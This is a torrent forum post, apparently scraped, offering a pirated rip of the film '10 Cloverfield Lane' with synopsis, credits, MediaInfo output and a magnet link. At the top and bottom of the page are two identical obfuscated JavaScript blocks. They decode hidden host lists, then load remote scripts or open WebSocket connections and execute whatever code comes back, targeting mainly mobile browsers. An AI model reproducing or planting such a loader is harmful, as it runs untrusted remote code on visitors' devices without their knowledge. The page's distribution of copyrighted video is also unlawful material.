科洛弗道10号[简繁字幕].10.Cloverfield.Lane.2016.BluRay.1080p.TrueHD.Atmos.7.1.x265.10bit 9.93GB

版主小s 1月前 251

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 科洛弗道10号 / 末世街10号(港) / 科洛弗10号地窖(台) / 科洛弗档案2 / 苜蓿地2 / 地窖 / Ten Cloverfield Lane / The Cellar

◎片 名 10 Cloverfield Lane

◎年 代 2016

◎产 地 美国

◎类 别 科幻 / 悬疑 / 惊悚

◎语 言 英语

◎上映日期 2016-03-11(美国)

◎IMDb链接 https://www.imdb.com/title/tt1179933/

◎豆瓣评分 6.9/10 (61596人评价)

◎豆瓣链接 https://movie.douban.com/subject/2977957/

◎片 长 103分钟

◎导 演 丹·特拉亨伯格 Dan Trachtenberg (id:1354103)

◎编 剧 乔什·坎贝尔 Josh Campbell (id:1355642)

马修·斯托肯 Matthew Stuecken (id:1355643)

达米恩·查泽雷 Damien Chazelle (id:1014996)

◎演 员 约翰·古德曼 John Goodman (id:1017898)

玛丽·伊丽莎白·温斯特德 Mary Elizabeth Winstead (id:1041018)

小约翰·加拉赫 John Gallagher Jr. (id:1018165)

布莱德利·库珀 Bradley Cooper (id:1013757)

道格拉斯·M·格里芬 Douglas M. Griffin (id:1093003)

苏珊·克莱尔 Suzanne Cryer (id:1078904)

素玛立·蒙塔诺 Sumalee Montano (id:1355645)

弗兰克·莫特克 Frank Mottek (id:1355646)

马特·里夫斯 Matt Reeves (id:1045032)

布莱恩·伯克 Bryan Burk (id:1014367)

J·J·艾布拉姆斯 J.J. Abrams (id:1010542)

斯特凡·格鲁比 Stefan Grube (id:1425935)

◎标 签 科幻 / 悬疑 / 惊悚 / 美国 / 灾难 / 2016 / 恐怖 / 剧情

◎简 介

年轻女子米歇尔(玛丽·伊丽莎白·温斯特德 Mary Elizabeth Winstead 饰)不久前刚和男友发生争吵,她夜晚驾车奔驰在黑暗的公路上,突然遭遇严重车祸昏迷过去。当她再度醒来时,发现自己被绑住手脚,关在一个密闭的空间里。少顷,一个健硕冷峻的男子霍华德(约翰·古德曼 John Goodman 饰)走了进来。军人出身的霍华德声称地球刚刚遭遇可怕的生化危机,地球人几乎灭亡殆尽。他在数年前未雨绸缪修建了这个设备、资源齐全的避难所,只为生存下去。避难所内,除了霍华德、米歇尔外,还有另外一个年轻男子埃米特。米歇尔对霍华德的说辞半信半疑,她坚信自己遭到了变态狂的拘禁。

真相究竟为何?威胁无处不在……

◎获奖情况 (共2项)

第69届美国导演工会奖 (2017)

最佳新人导演奖(提名)

└──丹·特拉亨伯格 (id:1354103)

第22届美国评论家选择电影奖 (2017)

最佳科幻/恐怖片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 23234803416154226601417656894205557126 (0x117ADC40E353A21680EA96749E217986)

  4. Complete name : 10.Clove[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.92 GiB

  8. Duration : 1 h 43 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 13.7 Mb/s

  11. Encoded date : UTC 2021-10-23 16:43:14

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 43 min

  21. Bit rate : 8 036 kb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.218

  31. Stream size : 5.81 GiB (59%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 8036 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=149006 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : MLP FBA 16-ch

  45. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  46. Commercial name : Dolby TrueHD with Dolby Atmos

  47. Codec ID : A_TRUEHD

  48. Duration : 1 h 43 min

  49. Bit rate mode : Variable

  50. Bit rate : 4 614 kb/s

  51. Maximum bit rate : 8 544 kb/s

  52. Channel(s) : 8 channels

  53. Channel layout : L R C LFE Ls Rs Lb Rb

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 1 200.000 FPS (40 SPF)

  56. Compression mode : Lossless

  57. Stream size : 3.34 GiB (34%)

  58. Title : English Dolby TrueHD 7.1 (Atmos) @ 4614 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No

  62. Number of dynamic objects : 11

  63. Bed channel count : 1 channel

  64. Bed channel configuration : LFE


  65. Audio #2

  66. ID : 3

  67. Format : AC-3

  68. Format/Info : Audio Coding 3

  69. Commercial name : Dolby Digital

  70. Codec ID : A_AC3

  71. Duration : 1 h 43 min

  72. Bit rate mode : Constant

  73. Bit rate : 640 kb/s

  74. Channel(s) : 6 channels

  75. Channel layout : L R C LFE Ls Rs

  76. Sampling rate : 48.0 kHz

  77. Frame rate : 31.250 FPS (1536 SPF)

  78. Compression mode : Lossy

  79. Stream size : 474 MiB (5%)

  80. Title : English AC3 5.1-EX @ 640 kbps

  81. Language : English

  82. Service kind : Complete Main

  83. Default : No

  84. Forced : No


  85. Audio #3

  86. ID : 4

  87. Format : AC-3

  88. Format/Info : Audio Coding 3

  89. Commercial name : Dolby Digital

  90. Codec ID : A_AC3

  91. Duration : 1 h 43 min

  92. Bit rate mode : Constant

  93. Bit rate : 224 kb/s

  94. Channel(s) : 2 channels

  95. Channel layout : L R

  96. Sampling rate : 48.0 kHz

  97. Frame rate : 31.250 FPS (1536 SPF)

  98. Compression mode : Lossy

  99. Stream size : 166 MiB (2%)

  100. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  101. Language : English

  102. Service kind : Complete Main

  103. Default : No

  104. Forced : No


  105. Text #1

  106. ID : 5

  107. Format : PGS

  108. Codec ID : S_HDMV/PGS

  109. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  110. Duration : 1 h 32 min

  111. Bit rate : 23.0 kb/s

  112. Count of elements : 1644

  113. Stream size : 15.3 MiB (0%)

  114. Title : Eng/SUP

  115. Language : English

  116. Default : No

  117. Forced : No


  118. Text #2

  119. ID : 6

  120. Format : PGS

  121. Codec ID : S_HDMV/PGS

  122. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration : 1 h 39 min

  124. Bit rate : 16.0 kb/s

  125. Count of elements : 1632

  126. Stream size : 11.4 MiB (0%)

  127. Title : Chs/SUP 原盘简体

  128. Language : Chinese

  129. Default : Yes

  130. Forced : No


  131. Text #3

  132. ID : 7

  133. Format : PGS

  134. Codec ID : S_HDMV/PGS

  135. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  136. Duration : 1 h 39 min

  137. Bit rate : 13.8 kb/s

  138. Count of elements : 1570

  139. Stream size : 9.80 MiB (0%)

  140. Title : Cht/SUP 原盘繁体(HK)

  141. Language : Chinese

  142. Default : No

  143. Forced : No


  144. Text #4

  145. ID : 8

  146. Format : PGS

  147. Codec ID : S_HDMV/PGS

  148. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  149. Duration : 1 h 39 min

  150. Bit rate : 16.4 kb/s

  151. Count of elements : 1638

  152. Stream size : 11.7 MiB (0%)

  153. Title : Cht/SUP 原盘繁体(TW)

  154. Language : Chinese

  155. Default : No

  156. Forced : No


  157. Text #5

  158. ID : 9

  159. Format : PGS

  160. Codec ID : S_HDMV/PGS

  161. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  162. Duration : 1 h 43 min

  163. Bit rate : 68.0 kb/s

  164. Count of elements : 3840

  165. Stream size : 50.2 MiB (0%)

  166. Title : Eng/SUP Commentary

  167. Language : English

  168. Default : No

  169. Forced : No


  170. Menu

  171. 00:00:00.000 : en:第 01 章

  172. 00:05:55.605 : en:第 02 章

  173. 00:14:52.517 : en:第 03 章

  174. 00:19:18.157 : en:第 04 章

  175. 00:24:11.992 : en:第 05 章

  176. 00:32:21.940 : en:第 06 章

  177. 00:42:59.243 : en:第 07 章

  178. 00:47:47.740 : en:第 08 章

  179. 00:53:37.089 : en:第 09 章

  180. 00:57:00.626 : en:第 10 章

  181. 01:03:10.745 : en:第 11 章

  182. 01:11:20.193 : en:第 12 章

  183. 01:15:49.420 : en:第 13 章

  184. 01:24:21.265 : en:第 14 章

  185. 01:28:19.085 : en:第 15 章

  186. 01:37:31.512 : en:第 16 章




复制代码


TAGS 惊悚 悬疑 科幻

磁力链:
  • magnet:?xt=urn:btih:8700073E1B32DD1EAFB54AC1FB497399A07A1E94

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};